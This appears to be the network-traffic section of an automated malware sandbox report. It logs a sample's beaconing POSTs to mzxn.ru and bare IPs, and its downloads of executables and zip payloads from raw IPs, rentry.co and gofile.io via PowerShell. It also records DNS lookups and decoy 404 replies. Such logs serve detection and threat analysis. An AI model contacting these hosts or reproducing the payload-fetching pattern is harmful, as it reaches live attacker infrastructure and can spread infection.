Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nfdfhrsebwtpak.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 346Host: mzxn.ru
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nbjnvxjkhmqxikmf.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 270Host: mzxn.ru
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://aqikanflflrl.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 151Host: mzxn.ru
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xulyufyklyfdh.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 271Host: mzxn.ru
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://foijjivakijcspuj.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 115Host: mzxn.ru
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nbeolaysbixye.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 197Host: mzxn.ru
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://lodrwjryqookcn.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 159Host: mzxn.ru
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fbsckrfixku.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 150Host: mzxn.ru
Source: global traffic HTTP traffic detected: GET /systemd.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 77.221.157.163
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://uafdxvcfkgfo.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 150Host: mzxn.ru
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rbkrqeaeqwvdi.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 349Host: mzxn.ru
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gbvtererkqfobu.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 261Host: mzxn.ru
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://icugirctwrbhpuq.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 301Host: mzxn.ru
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qnovtwajiclq.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 303Host: mzxn.ru
Source: global traffic HTTP traffic detected: GET /win.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 64.190.113.113
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qrsqtwgtiasbuo.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 309Host: mzxn.ru
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qgdbhmlcsptqb.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 335Host: mzxn.ru
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ohroqjqgvdh.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 169Host: mzxn.ru
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://swfkahecbiykwi.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 336Host: mzxn.ru
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fbuadeoajebihl.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 218Host: mzxn.ru
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://lsufwulnegxqsvy.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 354Host: mzxn.ru
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bluhmqewincunud.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 365Host: mzxn.ru
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://frvkldaekrdbt.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 241Host: mzxn.ru
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mqumylcqnaa.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 301Host: mzxn.ru
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wvcpcwinaogm.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 144Host: mzxn.ru
Source: global traffic HTTP traffic detected: GET /build.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 109.172.114.212
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qtgvwwvtuns.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 313Host: mzxn.ru
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nrlmldyquiidbru.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 286Host: mzxn.ru
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://iidaiysfdtd.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 330Host: mzxn.ru
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ggwxsequudqgaxcf.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 323Host: mzxn.ru
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://sqxnnumhnssm.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 349Host: mzxn.ru
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ctqgxbikusofytgf.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 148Host: mzxn.ru
Source: global traffic HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dbybeunkxlc.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 121Host: mzxn.ru
Source: unknown TCP traffic detected without corresponding DNS query: 77.221.157.163
Source: unknown TCP traffic detected without corresponding DNS query: 64.190.113.113
Source: global traffic HTTP traffic detected: GET /wp-content/images/pic1.jpg HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: mussangroup.com
Source: global traffic HTTP traffic detected: GET /setups.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: funrecipebooks.com
Source: global traffic HTTP traffic detected: GET /microgods/raw HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-CH) WindowsPowerShell/5.1.19041.1682Host: rentry.coConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /download/direct/6b24ec97-2a8d-468d-a24d-c8081cda1dab/vm.zip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: store4.gofile.ioConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /download/direct/0656c5cf-51b4-4fa4-ae48-8ee5ed3d142e/lm.zip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: store4.gofile.io
Source: global traffic DNS traffic detected: DNS query: mzxn.ru
Source: global traffic DNS traffic detected: DNS query: 206.23.85.13.in-addr.arpa
Source: global traffic DNS traffic detected: DNS query: mussangroup.com
Source: global traffic DNS traffic detected: DNS query: funrecipebooks.com
Source: global traffic DNS traffic detected: DNS query: callosallsaospz.shop
Source: global traffic DNS traffic detected: DNS query: rentry.co
Source: global traffic DNS traffic detected: DNS query: store4.gofile.io
Source: global traffic DNS traffic detected: DNS query: liernessfornicsa.shop
Source: unknown HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 9363
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 05:29:28 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 04 00 00 00 72 e8 86 ec Data Ascii: r
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 05:29:29 GMTContent-Type: text/html; charset=utf-8Connection: closeData Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 05:29:30 GMTContent-Type: text/html; charset=utf-8Connection: closeData Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 05:29:31 GMTContent-Type: text/html; charset=utf-8Connection: closeData Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 05:29:32 GMTContent-Type: text/html; charset=utf-8Connection: closeData Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 05:29:33 GMTContent-Type: text/html; charset=utf-8Connection: closeData Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 05:29:34 GMTContent-Type: text/html; charset=utf-8Connection: closeData Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 05:29:36 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 d0 9e 5c 2e 5c 24 14 a6 69 44 aa ad 10 bd cf b4 f9 6d 87 37 c6 ec 26 57 11 c2 8f 97 cb Data Ascii: #\.\$iDm7&W
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 05:30:01 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 27 Jul 2024 05:30:04 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
